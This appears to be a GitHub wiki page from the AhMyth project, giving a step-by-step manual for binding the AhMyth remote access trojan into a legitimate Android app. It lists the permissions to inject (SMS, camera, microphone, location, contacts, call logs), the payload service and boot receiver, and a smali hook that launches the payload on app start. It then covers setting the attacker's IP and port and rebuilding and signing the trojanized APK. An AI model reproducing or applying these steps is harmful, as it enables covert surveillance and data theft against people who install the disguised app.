-
Notifications
You must be signed in to change notification settings - Fork 210
User Manual ‐ Manually Template Original Applications ‐ Activity Based Method
- Apktool
- A properly configured, decompiled AhMyth payload
- Patience
- Decompile the original application using Apktool.
apktool d original.apk
java -jar apktool.jar d original.apk
- Enter the decompiled application folder and open the AndroidManifest.xml file in an editor such as Visual Studio Code or Sublime.
- Copy the payload permissions from the "Payload Permissions" dropdown tab below, and inject them with the original application's existing permissions, then save the file. Follow the dropdown "Help" tab to view an example if you get stuck.
Payload Permissions
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.WRITE_SMS"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
<uses-permission android:name="android.permission.INSTALL_PACKAGE"/>
ℹ️ Help
Original Manifest Before Payload Permissions Injection
Original Manifest After Payload Permissions Injection
The Injected Payload Permissions are Highlighted in Red 🔴
- Copy the payload Service below, and inject it with the applications existing services, if there are no existing services in the original application's manifest then inject it before the closing
</application>
tag in the original application's manifest, then save the file. Follow the dropdown "Help" example for further help.
<service android:enabled="true" android:exported="false" android:name="ahmyth.mine.king.ahmyth.MainService"/>
ℹ️ Help
If the manifest contains existing services, then we're going to need to insert the payload service just after the original application's last existing service in the manifest like so:
Original Manifest With Existing Services, Before Payload Service Injection
Original Manifest With Existing Services, After Payload Injection
The Injected Payload Service is highlighted in Red 🔴 while the application's last existing Service is highlighted in Blue 🔵
If the manifest does not contain any existing services, then insert the payload service just before the closing </application>
tag in the manifest like so:
Original Manifest Without Existing Services, Before Payload Service Injection
Original Manifest Without Existing Services, After Payload Service Injection
The Injected Payload Service is Highlighted in Red 🔴 while the application's closing
</application>
tag is highlighted in Blue 🔵
- Copy the payload Receiver below, and inject it with the applications existing services, if there are no existing services in the original application's manifest then inject it both before the closing
</application>
tag but after the previously injected payload receiver, then save the file. Follow the dropdown "Help" example for further help.
<receiver android:enabled="true" android:exported="true" android:name="ahmyth.mine.king.ahmyth.MyReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED"/>
</intent-filter>
</receiver>
ℹ️ Help
If the original application's manifest contains existing receivers, then insert the payload receiver just after the application's last existing receiver like so:
Original Manifest With Existing Receivers, Before Payload Receiver Injection
Original Manifest With Existing Receivers, After Payload Receiver Injection
The Injected Payload Receiver is highlighted in Red 🔴 while the application's last existing receiver tag is highlighted in Blue 🔵 along with the previously injected payload Service which is highlighted in Green 🟢
If the manifest does not contain any existing receivers, then insert the payload receiver just before the closing </application>
tag in the manifest like so:
Original Manifest Without Existing Receivers, Before Payload Receiver Injection
Original Manifest Without Existing Receivers, After Payload Receiver Injection
The Injected Payload Receiver is highlighted in Red 🔴 while the closing
</application>
tag is highlighted in Blue 🔵 along with the previously injected payload Service which is highlighted in Green 🟢
- Locate the name of a suitable class for hook injection, you have three options when doing this, you can:
Option A
Search the manifest for the application's Main Application Class Name .
When searching for the Main Application Class Name you'll want to locate the <application>
tag within in the manifest contents, it's usually just below where the application's permissions are declared.
Once you have located this tag, you'll then want to look for the android:name=
attribute, this will contain the application's Main Application Class name as well as it's path.
- NOTE: If the
android:name
attribute in the<application>
tag contains"android.app.Application"
as it's class name and path, then skip this option and move on to option B.
Option B
If Option A proves unsuitable, then you can search the manifest for the application's Main Launcher Activity class Name .
When searching for the application's Main Launcher Activity Class Name , look for the first occurrence of the <activity>
tag that includes <intent-filter> </intent-filter>
elements with the attributes android.intent.action.MAIN
and android.intent.category.LAUNCHER
located between them, (These intent-filters indicate that the activity is the main entry point of the application).
Once you locate the first occurrence of the <activity>
tag, that contains the appropriate elements and attributes explained before, you'll want to search for the android:name=
attribute which holds the name of the Main Launcher Activity Class as well as it's path .
- NOTE: If the
android:name=
attribute within the appropriate<activity>
tag contains"android.app.Activity"
as its class name and path, then skip this option and proceed to option C, as this doesn't point to a physical file.
Option C
If both Options A and Option B prove unsuitable, then you can search the activity aliases in the manifest for the a hookable class.
When doing this you'll want to start off by locating the first <activity-alias>
tag, once you've done this you'll then want to locate the android:targetActivity=
attribute within it, one of these will point to a physical file.
- NOTE: Keep in mind that Option C may prove to be quite time consuming for some applications, specifically large ones like Social Media apps, because the main class name and path output you get from either one of the Options in this Step is further utilised in Step 7 when we start locating the
*.smali
file the manifest class name and path we extracted points to, but unfortunately there is not much you can do about that, so if you end up on Option C, then continue to perform Option C with Step 7 until you locate a physical*.smali
file.
- Click the dropdown "Help" tab for further information and help.
ℹ️ Help
-
A: Main application class name extraction:
-
B: Main launcher activity class name extraction:
-
C: Main launcher activity class name extraction from an
<activity-alias>
:
- After you have extracted the name of a suitable Main Class from the manifest, you'll want to go ahead and open PowerShell if you're on Windows, or the Terminal if you're on Linux or macOS, and paste the appropriate command in order to quickly locate the correct
*.smali
file we need to inject our hook into, make sure to replacepath/to/original
with the path to the original APK you are backdooring, andClass-Name-Here.smali
with the class name you extracted from the manifest.
- Windows
set-location "path/to/original"; gci -recurse -filter "Class-Name-Here.smali" -file | resolve-path -relative
- Linux & macOS
cd path/to/original; find -name "Class-Name-Here.smali"
- Once you have located the application's main class Smali file, we can proceed to open the file in text editor.
- Now we need to insert our Payload Hook so we can allow our payload to start once the original application starts, click the dropdown Help tab to see how, MAKE SURE YOU READ THIS PART, MANUAL BINDING WITH AHMYTH HAS CHANGED MASSIVELY SINCE RELEASE OF v1.0-BETA.4.
ℹ️ Help
-
- Locate the 1st occurrence of the string
return-void
(Highlighted in Blue);
- Locate the 1st occurrence of the string
-
- Copy the new Static Payload Hook below.
- Copy the new Static Payload Hook below.
invoke-static {}, Lahmyth/mine/king/ahmyth/MainService;->start()V
-
- Inject the new Static Payload Hook (Highlighted in Red) just before the 1st occurrence of the string
return-void
(Highlighted in Blue), then save the file.
- Inject the new Static Payload Hook (Highlighted in Red) just before the 1st occurrence of the string
- Head into the Decompiled APK folder of your AhMyth Payload and enter the
smali
directory.
- Copy the payload folders inside the
smali
directory, excluding theandroid
andandroidx
folders, these will be copied over later on.
- Head back into the decompiled original application we're backdooring, and create a new smali_classes(X) directory (where "(X)" refers to the directory's respective numbering), click to the dropdown tab below to see more information about creating smali_classes(X) directories appropriately.
ℹ️ Creating "smali_classes(X)" Directories Appropriately
Creating smali_classes(X) directories isn't as hard as it sounds.
If the decompiled original application contains only one smali directory, then this directory will always be titled "smali"
, in which case all we need to do is create a new "smali_classes2"
directory and paste our copied AhMyth payload folders in the newly created "smali_classes2"
directory.
Before
After
If the decompiled original application contains multiple smali directories, then that means that we have a list of smali_classes(X) folders on our hands, you'll notice these directories are numbered as well.
So in order to create our new payload directory, all we need to do is following the numbering of the directories, which simply means that we create a smali_classes(X) folder based on the numbering of the last existing smali_classes(X) folder, so for example if this last existing smali_classes(X) folder is numbered as smali_classes10
, then we simply create the directory smali_classes11
and so on, the new directory's numbering should always be 1 more than the last existing smali_classes(X) folder.
Before
After
- Paste the copied AhMyth payload folders into the newly created smali_classes(X) directory.
- Head back into the
smali
folder of your decompiled AhMyth Payload, and copy theandroid
&androidx
folders.
- Paste the copied
android
&androidx
folders, into thesmali
folder of the Decompiled original application and replace files if prompted.
- After copying and pasting the
android
andandroidx
folders over to thesmali
directory in the Decompiled original application, you'll want to then edit IP:PORT file titlede.smali
which is located atsmali_classesX/ahmyth/mine/king/ahmyth
(wheresmali_classesX
corresponds to the payload directory we created for storing AhMyth payload files previously) and apply your own IP address and Port number, once you've done this, save the file.
- Close everything (make sure all modifications have been saved) and recompile the Backdoored application using apktool.
apktool b original -o Ahmyth.apk
java -jar apktool.jar b original -o Ahmyth.apk
- Sign the backdoored application using an APK signer. We recommend Uber APK Signer as it not only signs the payload, but also takes care of zipaligning the payload before signing it as well.
java -jar sign.jar -a path/to/Ahmyth.apk -o ~/path/to/output/folder
java -jar sign.jar -a path/to/folder/containing/the/payload